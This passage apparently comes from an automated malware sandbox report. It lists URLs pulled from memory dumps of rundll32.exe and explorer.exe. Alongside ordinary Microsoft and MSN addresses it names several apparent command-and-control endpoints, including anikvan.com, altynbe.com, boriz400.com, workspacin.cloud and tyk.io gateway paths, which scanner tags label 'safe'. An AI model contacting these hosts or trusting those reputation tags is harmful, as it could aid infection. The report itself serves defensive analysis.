                                          https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure=rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810618243.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://altynbe.com/tyk.iorundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000016.00000000.1847916203.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2942821965.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
                                            		high
                                            https://boriz400.com/api/azureyrundll32.exe, 00000012.00000003.2762031046.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882651450.00000292115BC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure(rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://excel.office.comexplorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                              		high
                                              https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                		high
                                                https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.phpPrundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://anikvan.com/I~rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/frundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000016.00000002.2945734291.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://anikvan.com/rundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php1jrundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://anikvan.com/content.php.frundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000016.00000000.1859052974.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C964000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://wns.windows.com/Lexplorer.exe, 00000016.00000000.1859052974.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2945734291.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.php4rundll32.exe, 00000012.00000003.2284190577.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311847302.000002921159F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://word.office.comexplorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://workspacin.cloud/live/0vaHexplorer.exe, 00000016.00000002.2943554599.00000000098A8000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://altynbe.com/U~rundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://altynbe.com/B_Frundll32.exe, 00000012.00000003.2680109233.00000292115BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZuexplorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://workspacin.cloud/live/6explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/Frundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://anikvan.com/content.phpGfrundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-winexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://altynbe.com/content.php2frundll32.exe, 00000012.00000003.1868997096.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284307888.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://anikvan.com/api/azuret.php.frundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeuexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-darkexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://www.rd.com/list/polite-habits-campers-dislike/explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpLrundll32.exe, 00000012.00000003.2810418995.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921159F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.000002921159F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://altynbe.com/rundll32.exe, 00000012.00000003.1867444760.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://android.notify.windows.com/iOSexplorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://anikvan.com/drundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurent.phprundll32.exe, 00000012.00000003.2797091473.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://altynbe.com/api/azureontent.phpMfErundll32.exe, 00000012.00000003.2001079033.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.imgexplorer.exe, 00000016.00000000.1846357884.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurep1jrundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797600040.000002921163E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738453835.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://outlook.com_explorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		low
                                                                                  https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppeexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://workspacin.cloud/live/J5explorer.exe, 00000016.00000002.2947027390.000000000CA7C000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpArundll32.exe, 00000012.00000003.2284190577.00000292115AE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-atexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpLgFrundll32.exe, 00000012.00000003.2762031046.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azure.phprundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/content.php&jrundll32.exe, 00000012.00000003.2311970800.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2491436893.000002921163E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://boriz400.com/qarundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-clexplorer.exe, 00000016.00000002.2940539964.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://powerpoint.office.comcemberexplorer.exe, 00000016.00000002.2945734291.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1859052974.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://workspacin.cloud/explorer.exe, 00000016.00000002.2945734291.000000000C54A000.00000004.00000001.00020000.00000000.sdmptrue
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://altynbe.com/Xrundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-explorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://uncertain-kitten-gw.aws-euc1.cloud-ara.tyk.io/api/azurepPrundll32.exe, 00000012.00000003.2415718994.000002921161C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          http://schemas.microexplorer.exe, 00000016.00000000.1850142884.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000000.1847476814.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.2941807069.0000000007F40000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          		unknown
                                                                                          https://altynbe.com/drundll32.exe, 00000012.00000003.2680109233.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://anikvan.com/api/azure==rundll32.exe, 00000012.00000003.2680109233.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1882552320.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2415718994.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2311970800.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000002.2938154508.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2001079033.00000292115EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.1991839967.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2762031046.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2284190577.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2042061481.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2738816096.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2397236802.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2810418995.00000292115EF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000012.00000003.2797091473.00000292115EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://ridiculous-breakpoint-gw.aws-use1.cloud-ara.tyk.io/content.phpMfErundll32.exe, 00000012.00000003.1991839967.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://altynbe.com/5~rundll32.exe, 00000012.00000003.1842659886.000002921161C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000016.00000002.2940539964.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.1846357884.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://boriz400.com/rundll32.exe, 00000012.00000003.2397236802.00000292115AE000.00000004.00000020.00020000.00000000.sdmpfalse
